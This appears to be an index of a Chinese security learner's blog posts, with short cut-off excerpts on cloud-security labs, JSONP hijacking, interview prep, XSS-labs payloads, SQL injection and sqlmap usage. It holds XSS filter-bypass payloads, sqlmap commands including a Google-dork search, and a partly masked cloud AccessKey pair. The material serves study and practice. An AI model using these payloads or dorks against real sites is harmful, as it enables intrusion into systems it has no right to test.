实战杂项
资产收集https://github.com/TophantTechnology/ARL
ReadCloud下载 https://github.com/khast3x/Redcloud
yum install unzipunzip Redcloud-master.zip
cd Redcloud-masterpython3 redcloud.py systemctl start docker
https://raw.githubusercontent.com/SelfhostedPro/selfhosted_templates/portainer-2.0/Template/template.json
云安全
搭建阿里云TerraformGoat开通之前现充钱 不要低于100,之后可以提现
docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash
阿里云 VPC 安全组允许所有端口访问获取accesskey
AccessKey IDLTAI5t**5AkeRSrPmgzZuAccessKey SecretNgJkDWDc**82VkCnPP7ZZKi0ml8
cd /TerraformGoat/aliyun/networking/vpc_security_group_open_all_ports
aliyun configure
...
JSONP
JSONP绕过csrf防护token什么是jsonpjsonps(json whith padding) 是json的一种”使用模式”,可以让网页从别的域名(网站)哪里获取资料,即跨域读取数据.jsonp的语法和json很像,简单来说就是在json外部用一个函数包裹着,
callback({"name":"kean","msg":"获取成功"});
jsonp的原理就是动态插入带有跨域url的<script>标签,然后调用回调函数,把我们需要的json数据作为参数传入,通过一些逻辑把数据显示在页面上面.
常见的jsonp形式类似
http://www.test.com/index.html?jsonpcallback=hehe
传过去的hehe就是函数名,服务器端返回的是一个函数调用,可以理解为hehe是一个函数名字,而返回的json数据就是函数的参数,网站的前段只需要在编写代码处理函数返回的值就可以
jsonp劫持漏洞<?php header('C ...
面试题目(简)
个人介绍平时没有事情的话会看着感兴趣的研究研究新爆出来的cve.然后还有会挖一些src,不过挖的不多,平时还是以学技术为主.护网的话,像国护网没有参加过,参加过两次小型的护网,也是我们这边驻场的邀请我们参加的,参加的蓝队,也是比较简单的一些工作.我的话呢,主要是负责监控流量,看安全设备,看SIP态势感知 WAF,微步查一下恶意IP,封IP.空闲时间也负责溯源和反制工作..比较擅长的是java方面的.
获取目标站点的绝对路径
如果是iis系统,尝试对参数进行恶意传值,使其出现报错页面
对目标网站进行js代码审计,查看是否存在信息泄露出站点的绝对路径
使用字典猜解目标站点的绝对路径
如果目标是thinkphp框架,尝试访问无效的路径,或者对参数进行而已传值使其报错
phpinfo页面泄露站点的绝对路径
怎样进行信息收集
获取目标的真实ip,如果有cdn就绕一下
通过真实去进行半开放的端口扫描,获取目标服务
通过审计js代码 + jsfinder工具查看是否存在接口泄露可以使我们进一步的利用
对站点进行指纹识别,查看cms历史漏洞
通过乌云查找目标的历史漏洞,查看脆弱点
通过google黑 ...
windows下的wsl-kail
wsl2下的kali环境首先在微软自带的应用商店安装Windows 终端
接着我们对Windows 终端进行基本的设置,启动默认为powershell
使用父进程目录
修改一下后背景图片
接着我们修改一下.bat文件的默认打开方式,打开注册表
计算机\HKEY_CLASSES_ROOT\batfile\shell\open\command
修改成wt.exe的路径加上后面的参数
"C:\Users\14980\AppData\Local\Microsoft\WindowsApps\wt.exe" -p "Command Prompt" "%1" %*
这样的话我们新建一个bat文件来在sqlmap.py目录下面
我们来双击这个bat文件
太好玩了
我们接着优化一下,这每次打开,路径占一半,真丑.
这样我们在工作目录创建一个wt.bat,写入
@echo offcall powershell.exe
为了防止误删,我们把属性设置为隐藏
再把这个bat添加到快捷启动项
这样打开就会在download目 ...
Github学习
创建版本库设置署名和邮箱git config --global user.name "wanan-love"git config --global user.email "1498032121@qq.com"
把目录变成git的仓库git init
向这个本地的暂存区添加当前目录的所有改动:git add .
或者只是添加某个文件:git add readme.txt
将文件从暂存区提交到本地仓库git commit -m "wrote a readme file"
时光机穿梭常看当前仓库的状态有没有未添加的git status
查看当前仓库的状态包括所有改动git diff
查看版本之间提交的历史记录git loggit log --pretty=oneline #在一行中显示1094adb7b9b3807259d8cb349e7df1d4d6477073 (HEAD -> master) append GPLe475afc93c209a690c39c13a46716e8fa000c366 add dis ...
Docker学习
架构
镜像:docker镜像,就相当于是一个root文件系统,比如官方镜像像ubuntu就包含了一套完整的ubuntu最小系统的root文件系统
容器:镜像和容器的关系,就像是面向对象程序设计中的类和实例一样,镜像是静态的定义,容器是镜像运行时的实体.容器可以被创建 启动 停止 删除和暂停等
仓库:仓库可以被看一个代码控制中心,用来保存镜像
docker使用客户端 服务器架构模式,使用远程api来管理和创建docker容器.docker容器通过docker镜像来创建
概念
说明
docker镜像(images)
docker镜像是用于创建docker容器的模板,比如ubuntu系统
docker容器(container)
容器是独立运行的一个或一组应用,是镜像运行的实体
docker客户端(client)
docker客户端通过命令行或者其他工具使用docker sdk与docker的守护进行通信
docker主机(host)
一个物理或者虚拟的机器用于执行docker守护进程和容器
docker registry
docker仓库用来保存镜像,可以理解为 ...
XSS
XSStrikeXSSlabs靶场payload?name=<script>alert(/1/)</script>?keyword="><script>alert(/1/)</script>//?keyword='onfocus=javascript:alert('xss')>//&submit=搜索?keyword="onfocus=javascript:alert('xss')>//&submit=搜索?keyword="> <a href=javascript:alert('xss') > xss</a> //&submit=搜索?keyword="><scRipt>alert(/1/)</scRipt>//&submit=搜索?keyword="><scscriptript>alert( ...
sql注入系统学习
sql注入系统学习寻找及确认sql注入于参数后面加一个单引号’and于or加法和减法数字型不需要单引号时
利用sql注入识别数据库asp和.net Microsoft SQL ServerPHP Mysql.PostgreSQLjava Oracle.Mysql
基于错误识别数据库需要一条详细的报错信息
基于数字函数推断
数据库服务器
函数
Mircrosoft SQL Server
@@pack_received.@@rowcount
Mysql
connection_id().last_insert_id().row_count().len()
Oracle
BITAND(1,1).length()
postgreSQL
select EXTRACT(DOW FROM NOW())
connection_id()不管值多少都是正的也就是真的,last_insert_id()这里不存在insert语句,默认情况就是返回零,也就是假.
那么如果and connection_id()数据返回正常,and last_insert_id()不返回数据我们 ...
sqlmap使用
sqlmap使用看到sql发送的测试payloadsqlmap对一个点是进行了怎样的尝试和读取数据的可以使用-v参数
0、只显示python错误以及严重的信息。1、同时显示基本信息和警告信息。(默认)2、同时显示debug信息。3、同时显示注入的payload。4、同时显示HTTP请求。5、同时显示HTTP响应头。6、同时显示HTTP响应页面。
如果想要看到sql发送的测试payload最好的等级就是3
获取目标方式目标url-u参数
python sqlmap.py -u http://127.0.0.1/sqlilabs/Less-2/?id=1 --batch
从文件中加载http请求-r参数
python sqlmap.py -r C:\Users\14980\Desktop\1.php --batch
从burp代理中获取日志-i
python sqlmap.py -l D:\Download\test.log --batch
处理谷歌的搜索请求-g
python sqlmap.py -g "inurl:\".php?id=1\&q ...